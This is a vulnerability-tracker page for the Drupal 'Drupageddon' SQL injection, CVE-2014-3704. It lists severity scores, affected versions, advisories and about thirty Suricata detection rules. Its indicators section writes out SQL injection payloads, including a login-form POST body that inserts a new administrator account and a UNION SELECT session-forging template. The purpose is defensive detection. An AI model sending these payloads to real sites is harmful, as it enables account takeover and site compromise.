CVE-2014-3704
published 2014-10-16CVE-2014-3704: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows…
PriorityP180high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
99.97%
100.0th percentile
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| drupal | drupal | >= 7.0 < 7.32 | 7.32 |
Detection & IOCsextracted from sources · hover to see the quote
commandUNION SELECT <uid>,'<user>','<pass>','','','',null,0,0,0,1,null,'',0,'',null,<uid>,'<session_id>','','127.0.0.1',0,0,null -- ↗
commandname[0 ;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)+1,'<user>','<hash>'+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name='<user>'),3);;# ]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in↗
cookieSESS<sha256(session_name)[0:32]>[test+<UNION SELECT inject with serialized PHP session>]=<session_id>↗
- →Detect HTTP requests to Drupal login endpoints where the 'name' parameter contains array keys with SQL keywords (e.g., UNION SELECT, INSERT INTO, UPDATE users) — the SQLi is delivered via crafted array key names in POST body or cookies. ↗
- →Monitor POST requests to /?q=node&destination=node with form_id=user_login_block containing URL-encoded SQL in the name[] parameter keys (e.g., name[0%20;insert+into+users...]). ↗
- →Detect HTTP requests carrying cookies where the Drupal session cookie name (SESS<hash>) contains array-style keys with SQL injection payloads (e.g., SESS<hash>[test+UNION SELECT...]). ↗
- →Alert on HTTP responses containing the string 'mb_strlen() expects parameter 1 to be string' as this indicates successful exploitation of the Drupageddon SQL injection. ↗
- →Detect PHP code injection via Drupal session data: look for session values containing 'wrapper_callback' => 'form_execute_handlers', 'assert', and 'eval(base64_decode(...))' patterns, indicative of the RCE chained exploit. ↗
- →Monitor for new Drupal admin account creation or privilege escalation (INSERT INTO users_roles with rid=3) immediately following login form POST requests, which may indicate successful Drupageddon exploitation. ↗
- →The Metasploit module drupal_drupageddon uses two methods: form-cache PHP injection (TARGET 0) and user-post injection (TARGET 1). Detect by monitoring for new admin user creation, PHP module enablement, and new posts containing PHP code on Drupal 7.0–7.31 instances. ↗
- ·The cookie-based exploit (EDB-44355 and EDB-35150) only works against HTTPS URLs, as the session cookie name is derived from the hostname portion after stripping the protocol. HTTP targets use a different attack vector (POST body injection). ↗
- ·The RCE chained exploit (EDB-35150) uses REPLACE/CHAR SQL functions to smuggle serialized PHP session data containing curly braces past SQL string escaping, meaning detection must account for REPLACE(REPLACE(...,CHAR(125)),CHAR(123)) patterns in the injected payload. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f9cm-c972-9975: The expandArguments function in the database abstraction API in Drupal core 7
ghsa_unreviewed·2022-05-13
CVE-2014-3704 [HIGH] CWE-89 GHSA-f9cm-c972-9975: The expandArguments function in the database abstraction API in Drupal core 7
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
OSV
CVE-2014-3704: The expandArguments function in the database abstraction API in Drupal core 7
osv·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] CVE-2014-3704: The expandArguments function in the database abstraction API in Drupal core 7
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
VulnCheck
Drupal Drupal Core Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2014·CVSS 7.5
CVE-2014-3704 [HIGH] Drupal Drupal Core Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Drupal Drupal Core Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
Affected: Drupal Drupal Core
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.greynoise.io/blog/coordinated-cloud-based-scanning-operation-targets-75-known-exposure-points
Exploit PoC: https://vulncheck.com/xdb/497be7626f8c; https://
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 3
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 3
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 3
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 3"; flow:established,to_server; http.request_body; content:"nam%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])nam\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019424; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 29
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 29
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 29
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 29"; flow:established,to_server; http.request_body; content:"%6e%61%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019450; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 10
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 10
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 10
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 10"; flow:established,to_server; http.request_body; content:"n%61me%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61me\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019431; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 26
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 26
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 26
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 26"; flow:established,to_server; http.request_body; content:"%6e%61me%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61me\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019447; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 7
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 7
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 7
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 7"; flow:established,to_server; http.request_body; content:"na%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019428; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 14
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 14
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 14
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 14"; flow:established,to_server; http.request_body; content:"n%61%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019435; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 20
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 20
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 20
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 20"; flow:established,to_server; http.request_body; content:"%6eam%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eam\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019441; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 24
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 24
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 24
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 24"; flow:established,to_server; http.request_body; content:"%6ea%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019445; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 16
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 16
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 16
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 16"; flow:established,to_server; http.request_body; content:"n%61%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019437; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 27
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 27
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 27
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 27"; flow:established,to_server; http.request_body; content:"%6e%61m%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61m\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019448; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 22
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 22
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 22
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 22"; flow:established,to_server; http.request_body; content:"%6ea%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019443; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 11
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 11
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 11
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 11"; flow:established,to_server; http.request_body; content:"n%61m%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61m\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019432; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 4
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 4
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 4
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 4"; flow:established,to_server; http.request_body; content:"nam%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])nam\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019425; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 30
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 30
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 30
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 30"; flow:established,to_server; http.request_body; content:"%6e%61%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019451; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 15
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 15
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 15
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 15"; flow:established,to_server; http.request_body; content:"n%61%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019436; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 8
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 8
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 8
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 8"; flow:established,to_server; http.request_body; content:"na%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019429; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 19
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 19
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 19
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 19"; flow:established,to_server; http.request_body; content:"%6eam%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eam\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019440; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 32
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 32
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 32
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 32"; flow:established,to_server; http.request_body; content:"%6e%61%6d%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6d\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019453; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 9
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 9
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 9
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 9"; flow:established,to_server; http.request_body; content:"n%61me["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61me\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019430; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 18
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 18
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 18
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 18"; flow:established,to_server; http.request_body; content:"%6eame%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eame\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019439; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 25
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 25
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 25
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 25"; flow:established,to_server; http.request_body; content:"%6e%61me["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61me\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019446; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 1
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 1
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 1
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 1"; flow:established,to_server; http.request_body; content:"name["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])name\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019422; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 5
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 5
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 5
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 5"; flow:established,to_server; http.request_body; content:"na%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019426; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 21
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 21
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 21
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 21"; flow:established,to_server; http.request_body; content:"%6ea%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019442; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 13
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 13
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 13
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 13"; flow:established,to_server; http.request_body; content:"n%61%6de["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61\%6de\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019434; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 17
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 17
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 17
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 17"; flow:established,to_server; http.request_body; content:"%6eame["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6eame\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019438; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 28
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 28
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 28
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 28"; flow:established,to_server; http.request_body; content:"%6e%61m%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61m\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019449; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 31
suricata·2014-10-16·CVSS 7.5
